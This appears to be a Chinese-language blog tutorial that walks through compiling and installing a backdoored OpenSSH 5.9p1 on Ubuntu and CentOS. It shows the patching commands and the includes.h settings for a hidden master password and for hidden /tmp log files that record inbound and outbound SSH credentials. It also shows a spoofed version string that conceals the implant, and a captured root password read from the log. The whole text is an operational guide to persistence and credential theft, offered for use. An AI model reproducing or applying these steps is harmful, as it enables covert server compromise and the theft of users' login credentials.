Openssh后门 – Ubuntu/Centos
Openssh后门 – Ubuntu/Centos
这个后门真的又可怕又好用... 网上流传的都是Centos的版本,因为场景不同,我研究了一下针对Ubuntu,大同小异。
我的理解是在服务器在装一个不同版本的Openssh,打上相应的Patch使其能正常运作。
两个文件我存起来了:
openssh-5.9p1.tar.gz
openssh-5.9p1.patch.tar.gz
root:openssh-5.9p1/ # ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8, OpenSSL 1.0.1f 6 Jan 2014 root:~/ # ls openssh-5.9p1.patch.tar.gz openssh-5.9p1.tar.gz root:~/ # tar zxf openssh-5.9p1.patch.tar.gz root:~/ # tar zxf openssh-5.9p1.tar.gz root:~/ # ls openssh-5.9p1 openssh-5.9p1.patch openssh-5.9p1.patch.tar.gz openssh-5.9p1.tar.gz root:~/ # cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/ root:~/ # cd openssh-5.9p1 root:openssh-5.9p1/ # patch < sshbd5.9p1.diff patching file auth.c patching file auth-pam.c patching file auth-passwd.c patching file canohost.c patching file includes.h patching file log.c patching file servconf.c patching file sshconnect2.c patching file sshlogin.c patching file version.h root:openssh-5.9p1/ #
12345678910111213141516171819202122 | root:openssh-5.9p1/ # ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8, OpenSSL 1.0.1f 6 Jan 2014root:~/ # ls openssh-5.9p1.patch.tar.gz openssh-5.9p1.tar.gzroot:~/ # tar zxf openssh-5.9p1.patch.tar.gz root:~/ # tar zxf openssh-5.9p1.tar.gz root:~/ # ls openssh-5.9p1 openssh-5.9p1.patch openssh-5.9p1.patch.tar.gz openssh-5.9p1.tar.gzroot:~/ # cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/ root:~/ # cd openssh-5.9p1 root:openssh-5.9p1/ # patch < sshbd5.9p1.diff patching file auth.cpatching file auth-pam.cpatching file auth-passwd.cpatching file canohost.cpatching file includes.hpatching file log.cpatching file servconf.cpatching file sshconnect2.cpatching file sshlogin.cpatching file version.hroot:openssh-5.9p1/ # |
|---|
root:openssh-5.9p1/ # vim includes.h
1 | root:openssh-5.9p1/ # vim includes.h |
|---|
1 |
|---|
修改后门密码和记录文件的位置,最底下可见:
int secret_ok; FILE *f; #define ILOG "/tmp/.ilog" /* 记录登录到本机的用户名和密码 */ #define OLOG "/tmp/.olog" /* 记录本机登录到远程的用户名和密码 */ #define SECRETPW "test" /* 后门的密码 */ #endif /* INCLUDES_H */
123456 | int secret_ok;FILE *f;#define ILOG "/tmp/.ilog" /* 记录登录到本机的用户名和密码 */#define OLOG "/tmp/.olog" /* 记录本机登录到远程的用户名和密码 */#define SECRETPW "test" /* 后门的密码 */#endif /* INCLUDES_H */ |
|---|
这边文件前面加上.相当于是隐藏文件,也可以换个隐蔽的目录
修改ssh版本信息,改成原来的
/* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */ #define SSH_VERSION "OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8" #define SSH_PORTABLE "p1" #define SSH_RELEASE SSH_VERSION SSH_PORTABLE
123456 | /* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */ #define SSH_VERSION "OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8" #define SSH_PORTABLE "p1"#define SSH_RELEASE SSH_VERSION SSH_PORTABLE |
|---|
安装所需环境
Ubuntu: root:openssh-5.9p1/ # apt-get install -y openssl libssl-dev libpam0g-dev Centos: root:openssh-5.9p1/ # yum install -y openssl openssl-devel pam-devel
12345 | Ubuntu:root:openssh-5.9p1/ # apt-get install -y openssl libssl-dev libpam0g-dev Centos:root:openssh-5.9p1/ # yum install -y openssl openssl-devel pam-devel |
|---|
编译安装
Ubuntu: root:openssh-5.9p1/ # ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam root:openssh-5.9p1/ # make && make install root:openssh-5.9p1/ # service ssh restart Centos: root:openssh-5.9p1/ # ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 root:openssh-5.9p1/ # make && make install root:openssh-5.9p1/ # service sshd restart
123456789 | Ubuntu:root:openssh-5.9p1/ # ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pamroot:openssh-5.9p1/ # make && make installroot:openssh-5.9p1/ # service ssh restart Centos:root:openssh-5.9p1/ # ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5root:openssh-5.9p1/ # make && make installroot:openssh-5.9p1/ # service sshd restart |
|---|
重启ssh的时候可能会没有回应,卡在那边的样子,但是其实已经成功重启了。
登录前到/tmp/里看没有相应文件产生,然后先正常的密码toor登录:
root:/tmp/ # ls -a | grep log vgauthsvclog.txt.0 root:/tmp/ # ls -a | grep log .ilog vgauthsvclog.txt.0 root:/tmp/ # cat .ilog user:password --> root:toor
1234567 | root:/tmp/ # ls -a | grep log vgauthsvclog.txt.0root:/tmp/ # ls -a | grep log .ilogvgauthsvclog.txt.0root:/tmp/ # cat .ilog user:password --> root:toor |
|---|